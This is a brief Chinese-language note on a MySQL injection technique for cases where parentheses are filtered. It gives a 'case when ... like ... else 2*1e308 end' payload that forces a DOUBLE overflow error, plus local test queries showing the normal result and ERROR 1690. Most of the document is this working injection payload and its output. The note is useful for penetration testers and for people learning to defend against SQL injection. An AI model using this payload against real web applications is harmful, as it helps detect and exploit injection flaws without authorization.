0x00 概要

只能用来证明是注入的方法

因为出现不了 ( )括号, 导致很多函数与方法都使用不了

0x00 记忆方式

case when ‘12345’like’1%’ then’1’else 2*1e308 end

0x01 测试数据

  1. mysql> select user();
  2. +----------------+
  3. | user() |
  4. +----------------+
  5. | root@localhost |
  6. +----------------+
  7. 1 row in set (0.00 sec)
  1. mysql> select * from tdb_goods where goods_id=1;
  2. +----------+----------------------------+------------+------------+-------------+---------+------------+
  3. | goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |
  4. +----------+----------------------------+------------+------------+-------------+---------+------------+
  5. | 1 | R510VC 15.6英寸笔记本 | 笔记本 | 华硕 | 3399.000 | 1 | 0 |
  6. +----------+----------------------------+------------+------------+-------------+---------+------------+
  7. 1 row in set (0.00 sec)

0x01 测试

  1. // 正确的情况
  2. // 会返回原来的数据页面保持不变
  3. mysql> select * from tdb_goods where goods_id=1 and case when '12345'like'1%' then'1'else 2*1e308 end;
  4. +----------+----------------------------+------------+------------+-------------+---------+------------+
  5. | goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff |
  6. +----------+----------------------------+------------+------------+-------------+---------+------------+
  7. | 1 | R510VC 15.6英寸笔记本 | 笔记本 | 华硕 | 3399.000 | 1 | 0 |
  8. +----------+----------------------------+------------+------------+-------------+---------+------------+
  9. 1 row in set (0.00 sec)
  1. // 错误的情况
  2. // 页面会爆错,如果关闭了错误提示,页面的数据会为空
  3. mysql> select * from tdb_goods where goods_id=1 and case when '12345'like'66%' then'1'else 2*1e308 end;
  4. ERROR 1690 - DOUBLE value is out of range in '(2 * 1e308)'